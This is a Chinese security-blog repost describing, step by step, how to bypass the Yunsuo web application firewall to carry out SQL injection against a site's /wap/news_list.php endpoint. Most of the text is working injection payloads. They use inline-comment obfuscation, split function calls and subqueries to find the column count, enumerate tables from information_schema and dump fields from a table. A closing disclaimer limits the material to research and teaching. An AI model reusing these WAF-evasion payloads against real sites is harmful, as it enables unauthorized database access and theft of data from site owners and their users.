从0开始Bypass之云锁篇

admin
admin
admin
140350
文章
117
评论
2025年1月3日13:52:57评论6 views字数 1001阅读3分20秒阅读模式

1、判断注入:

神奇的发现云锁and不拦

/wap/news_list.php?id=1%20and%201=1

从0开始Bypass之云锁篇

and 1=2 报错

从0开始Bypass之云锁篇

2、接下来就是要得出字段数了,但是发现云锁拦了order by这个组合

order by 21 拦截

从0开始Bypass之云锁篇

wap/news_list.php?id=1%20order/*!66666asd*/by%2021  不拦

从0开始Bypass之云锁篇

3、显错位

得出3为显错位

从0开始Bypass之云锁篇

4、联合查询

union/*!66666asd*/select 采用注释绕过

union select 拦截

从0开始Bypass之云锁篇

union/*!66666asd*/select  不拦

从0开始Bypass之云锁篇

5、爆库

wap/news_list.php?id=1%20union/*!66666asd*/select%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20limit%201,1  拦截

从0开始Bypass之云锁篇

wap/news_list.php?id=1%20union/*!66666asd*/select%201,2,database/*//*/(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20limit%201,1   不拦

从0开始Bypass之云锁篇

5、查表

云锁把select from拦得死死的,这边采用子查询绕过

union/*!66666asd*/select--1,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20limit%201,1   不拦

从0开始Bypass之云锁篇

从0开始Bypass之云锁篇

6、获取字段

%20union%20/*!66666asd*/select--1,2,(select%20group_concat(concat(id,title))%20from%20demo_daohangfl),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20limit%201,1

从0开始Bypass之云锁篇

总结

手法采用了大量的注释和子查询来达到bypass效果。

如文中有误请各位老师傅不吝指教。

原文始发于微信公众号(刑天攻防实验室):从0开始Bypass之云锁篇

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月3日13:52:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从0开始Bypass之云锁篇https://cn-sec.com/archives/1864528.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息